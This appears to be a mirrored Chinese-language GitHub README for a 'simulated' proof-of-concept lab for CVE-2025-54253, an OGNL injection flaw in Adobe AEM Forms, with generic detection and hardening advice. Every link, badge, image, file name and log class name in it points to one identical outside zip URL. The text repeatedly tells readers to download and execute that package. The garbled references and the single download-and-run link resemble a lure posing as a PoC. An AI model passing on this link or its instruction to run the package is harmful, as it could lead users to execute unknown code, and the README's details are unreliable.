jm7knz/CVE-2025-54253-Exploit-Demo

GitHub: jm7knz/CVE-2025-54253-Exploit-Demo

针对 Adobe AEM Forms OGNL 注入漏洞的攻防一体化研究套件,包含 PoC 演示、检测规则与缓解指导。

Stars: 1 | Forks: 0

# CVE-2025-54253 Adobe AEM OGNL 注入模拟 PoC 实验环境 [![Releases](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip)](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip) ![Security banner](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip) 目录 - 概述 - 本仓库包含的内容 - 目标 - 威胁模型 - 安全实验室设置 - 如何运行模拟 - 观察要点 - 检测指南 - 缓解措施与加固 - 致蓝队 - 文件与结构 - 发布版本 - 贡献 - 许可证 - 维护者 - 参考资料与学习 概述 本仓库托管了 CVE-2025-54253 的模拟概念验证,这是 Adobe AEM 组件中报告的一个 OGNL 注入漏洞。该模拟旨在帮助安全团队和研究人员在受控实验室中复现该行为。本仓库不包含针对真实面向互联网系统的有效利用代码。请仅在受控、隔离的环境中使用这些内容。 本仓库包含的内容 - 一个模拟包,用于重建易受攻击的请求处理流程。该包模拟了 OGNL 表达式在配置错误的 AEM 表单处理程序中可能被评估的方式。 - 反映易受攻击实例可能发出的示例日志。 - 用于 SIEM 和 EDR 的检测规则和样本签名。 - 安全测试清单。 - 关于指标、缓解步骤和安全配置指导的文档。 目标 - 帮助测试人员构建可重复的实验室,以验证检测和修复措施。 - 教授指向 OGNL 注入尝试的防御性信号。 - 提供非可执行的说明性示例,以解释漏洞流程。 - 避免分发针对生产目标的有效远程利用代码。 威胁模型 - 攻击向量:向 AEM 表单端点发送包含 OGNL 表达式的精心构造的请求。 - 影响:如果发生评估,攻击者可能会执行服务器端代码或根据环境提升权限。 - 假设:实验室实例运行具有逼真的 AEM 设置。该环境可能包含默认或配置错误的组件。 安全实验室设置 - 在一个或多个隔离的虚拟机或本地沙箱中运行模拟。使用快照和临时实例。 - 不要将实验室虚拟机连接到生产网络。 - 限制服务帐户和凭据。在测试环境中使用一次性帐户。 - 确保您的测试 AEM 实例仅使用示例数据。 - 使用监控和日志记录工具,以便您可以在不冒失控影响风险的情况下观察行为。 如何运行模拟 - 从 Releases 获取模拟包:https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip - 发布文件需要在隔离的测试虚拟机内下载并执行。该包包含一个分步 README,位于存档内,列出了部署模拟器、配置本地类 AEM 端点以及运行合成请求流程的顺序。 - 遵循发布包内的内部 README。发布的包仅包含模拟构件和精选日志。它不针对外部服务。 观察要点 - 显示 OGNL 风格 payload 字符串到达应用层的合成请求日志。 - 演示表达式解析和评估点的应用程序端堆栈跟踪。 - 为实验室虚拟机内的进程生成尝试、异常环境访问或文件写入生成的事件。 - 由提供的检测规则触发的 SIEM 警报。 检测指南 - 监视 HTTP 请求主体中看起来像 OGNL 表达式的模式。典型标记包括 %{...} 或直接的 OGNL 语法标记。使用百分比编码和双重编码检查。 - 检查日志中是否包含类 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip,https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip,或相关的评估堆栈跟踪。 - 创建关联规则,将异常请求主体与下游进程活动或意外的文件系统修改结合起来。 - 将基于正则表达式的签名添加到 WAF 以阻止明显的 OGNL payload 模式。不要仅依赖模式阻断;将阻断与检测配对使用。 建议的检测规则示例(概念性) - 标记主体包含匹配常见 OGNL 标记和函数调用模式的 POST 请求。 - 当应用程序日志中提到 OGNL、ExpressionFactory 或评估异常的解析错误时发出警报。 - 将源自 Web 用户的意外命令行进程创建与 HTTP 请求关联起来。 缓解措施与加固 - 将 AEM 升级到修复了 CVE-2025-54253 的供应商固定版本。应用供应商提供的补丁。 - 禁用或移除不需要的服务器端表达式评估功能。 - 在表单处理程序和模板处理器上执行严格的输入验证和规范化。 - 在适用的地方强化 Java SecurityManager 策略,以限制动态代码执行和反射。 - 在应用程序前放置 WAF,阻止已知的恶意模式并强制执行请求大小限制。 - 对服务帐户使用最小权限,并使用受限制的操作系统级权限运行应用程序进程。 致蓝队 - 在暂存 SIEM 中部署示例检测构件,并根据您的环境对其进行调优。 - 为应用程序在表单处理期间写入的目录添加文件完整性监控。 - 使用端点 EDR 策略防止 Web 进程生成 Shell 或创建新的系统用户。 - 为分诊创建 playbook 步骤:捕获 HTTP 请求,提取原始主体,在隔离服务器上复制,并检查本地更改。 文件与结构 - docs/ - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip — SIEM 规则示例和调优说明。 - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip — SOC 分诊清单步骤。 - samples/ - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip — 用于实验室重放的合成请求。这些是说明性的且不可执行的。 - synthetic-logs/ — 反映易受攻击行为的精选日志。 - tools/ - lab-helpers/ — 用于在受控虚拟机中部署模拟器的脚本。发布版包含上面引用的可执行包。 - LICENSE 发布版本 [![Download release](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip)](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip) 访问 Releases 页面获取模拟包:https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip 发布文件需要在隔离的实验室中下载并执行。该包包含有关如何设置模拟器、部署虚拟 AEM 端点以及运行测试流程的内部说明。 维护者 - jm7knz — 仓库所有者和策展人 - 贡献者可以提交带有额外检测内容、日志样本或实验室改进的问题或拉取请求。 贡献 - 如果您发现检测范围或文档存在缺口,请提交 GitHub issue。 - 提交可增强安全测试的防御性签名、日志示例或实验室编排脚本的 PR。 - 保持拉取请求重点突出,并在适用的情况下包含测试。不要添加针对隔离实验室之外真实系统的利用代码或工具。 许可证 - 本仓库使用 MIT 许可证。有关完整条款,请查看 LICENSE 文件。 参考资料与学习 - 关于 AEM 和表单组件的 Adobe 安全公告。 - OWASP 关于输入验证和安全反序列化的指南。 - 针对 CVE-2025-54253 及相关修复的供应商补丁说明。 - 用于理解表达式评估风险的通用 OGNL 资源。 图像和视觉辅助 - 仓库使用上面的安全横幅和徽章,以便快速导航到发布版本和版本信息。 - 将您自己的屏幕截图添加到 samples/ 文件夹,以显示实验室运行期间的 SIEM 命中或 EDR 警报。 用例 - 紫队可以运行模拟来测试检测和响应。 - 红队可以使用模拟构件来训练 playbook,而无需针对实时系统。 - 开发人员可以学习安全编码模式并移除有风险的表达式评估挂钩。 关键词和主题 adobe-aem, aem-forms-on-jee, curl, cve-2025-54253, cybersecurity, ethical-hacking, exploit, infosec, local-testing, offensive-security, ognl-injection-vulnerability, penetration-testing, poc, proof-of-concept, rce, red-team, remote-code-execution, vmware-lab, vulnerability-research 参考 - 供应商公告和补丁说明(在供应商站点搜索 CVE-2025-54253) - OWASP 测试指南 - 公共 SIEM 规则集和用于 Web payload 检测的正则表达式库 图像致谢 - 来自 GitHub Explore topics 的安全图标 - 徽章通过 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip 生成 最后更新 - 查看 Releases 页面以获取最新的模拟包和变更日志:https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip
标签:0day, Adobe AEM, AEM Forms on JEE, AMSI绕过, CISA项目, CVE-2025-54253, EDR, JS文件枚举, OGNL注入, PoC, Python, RCE, SIEM规则, 威胁检测, 子域枚举, 数据展示, 无后门, 暴力破解, 漏洞复现, 红队, 编程工具, 网络安全, 脆弱性评估, 表达式语言注入, 输入验证绕过, 远程代码执行, 隐私保护